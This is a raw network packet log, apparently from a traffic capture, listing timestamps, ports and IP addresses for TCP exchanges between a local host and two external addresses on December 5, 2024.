Dec 5, 2024 17:32:16.863236904 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.863445997 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.864063025 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.864105940 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.864139080 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.864168882 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.864989996 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.865001917 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.865034103 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.865761995 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.865773916 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.865797043 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.865823984 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.866682053 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.866730928 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.867350101 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.867386103 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.867547989 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.867580891 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.867882013 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.867918015 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.868514061 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.868554115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.868916988 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.868948936 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.869461060 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.869491100 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.869920015 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.869962931 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.870347023 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.870378017 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.870573044 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.870604992 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.871356010 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.871603012 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.871642113 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.872229099 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.872271061 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.872628927 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.872665882 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.873202085 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.873315096 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.873398066 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.873433113 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.874186993 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.874552965 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.874596119 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.875057936 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.875101089 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.875451088 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.875488997 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.875958920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.875991106 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.876807928 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.876841068 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.876967907 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.876981020 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.876998901 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.877017021 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.877829075 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.878051043 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.878194094 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.878232002 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.878892899 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.879071951 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.879103899 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.879658937 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.879692078 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.880218983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.880259991 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.880707026 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.880739927 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.881027937 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.881061077 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.881582975 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.881617069 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.881753922 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.881783009 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.882529020 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.882569075 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.883035898 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.883071899 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.883404970 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.883416891 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.883445024 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.883462906 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.884462118 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.884501934 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.884740114 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.884776115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.885318041 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.885359049 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.885574102 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.885607958 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.886234045 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.886301041 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.886884928 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.887092113 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.887132883 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.887167931 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.887201071 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.888061047 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.888101101 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.888607025 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.888650894 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.888986111 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.889019012 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.889667988 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.889678955 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.889695883 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.889698029 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.889717102 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.889733076 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.890717983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.890728951 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.890748978 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.890765905 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.891491890 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.891993999 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.892028093 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.892436028 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:16.892474890 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:16.914032936 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:16.917916059 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:17.045244932 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.045265913 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.045335054 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.045630932 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.045644999 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.045675039 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.045698881 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.046551943 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.047179937 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.047219992 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.047466993 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.047502041 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.047981024 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.048016071 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.048511982 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.048552036 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.048713923 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.048747063 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.049412012 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.049424887 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.049443960 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.049463034 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.050273895 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.050573111 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.050606012 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.050640106 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.051245928 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.051286936 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.051440001 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.051470995 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.052190065 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.052845001 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.052887917 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.053052902 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.053092957 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.053338051 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.053374052 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.055058956 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.055099964 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.055428028 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.055469990 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.055629015 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.055670977 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.055743933 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.056560993 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.056601048 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.056726933 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.056766033 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.057300091 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.057337046 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.057821035 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.057861090 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.058098078 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.058109999 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.058134079 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.058146000 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.058948040 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.059236050 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.059279919 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.059849024 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.059890985 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.060264111 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.060328960 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.060707092 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.060744047 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.060765982 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.060798883 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.061517954 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.061554909 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.061845064 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.062452078 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.062494993 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.062576056 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.062613010 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.063334942 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.063376904 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.063441038 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.063486099 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.064348936 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.064390898 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.064585924 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.064661026 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.065231085 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.065263987 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.065280914 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.065308094 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.066116095 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.066139936 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.066167116 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.066174984 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.067002058 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.067050934 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.067105055 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.067996979 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.068048000 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.068154097 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.068202972 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.069027901 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.069073915 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.069106102 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.069145918 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.069938898 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.069994926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.070559978 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.070605993 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.070790052 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.070802927 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.070842028 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.071737051 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.071788073 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.072041035 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.072083950 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.072618961 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.072669029 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.072715998 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.072751045 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.073718071 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.073776007 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.073873997 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.073920965 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.074516058 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.074568033 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.074790001 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.075670004 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.075685978 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.075716019 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.075741053 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.076384068 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.077090979 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.077136040 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.077275991 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.077290058 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.077317953 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.077342987 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.078178883 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.078530073 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.078573942 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.079086065 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.079334974 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.079381943 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.080043077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.080091000 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.080390930 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.080451012 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.081212044 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.081262112 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.081486940 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.081531048 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.081901073 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.081947088 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.082017899 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.082861900 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.082904100 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.083950996 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.083977938 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.083990097 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.083992958 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.084027052 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.084805965 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.085763931 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.085777998 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.085820913 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.085854053 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.085889101 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.085949898 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.086540937 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.087740898 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.087800026 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.087812901 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.087826014 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.087837934 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.087882042 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.087882042 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.088469982 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.088510990 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.088726997 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.088768005 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.089405060 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.089448929 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.089844942 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.089884043 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.090317965 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.090365887 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.090692997 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.090738058 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.091355085 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.091717005 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.091768980 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.092264891 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.092297077 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.092308998 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.092350006 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.093189955 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.093209028 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.093235970 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.093256950 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.093935013 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.094412088 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.237529993 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.237739086 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.237865925 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.237957001 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.237996101 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.238090038 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.238126040 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.238903046 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.238950014 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.239783049 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.239995956 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.240010023 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.240046024 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.240062952 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.241208076 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.241919041 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:17.241969109 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:17.241986036 CET	80	49793	185.215.113.84	192.168.2.11
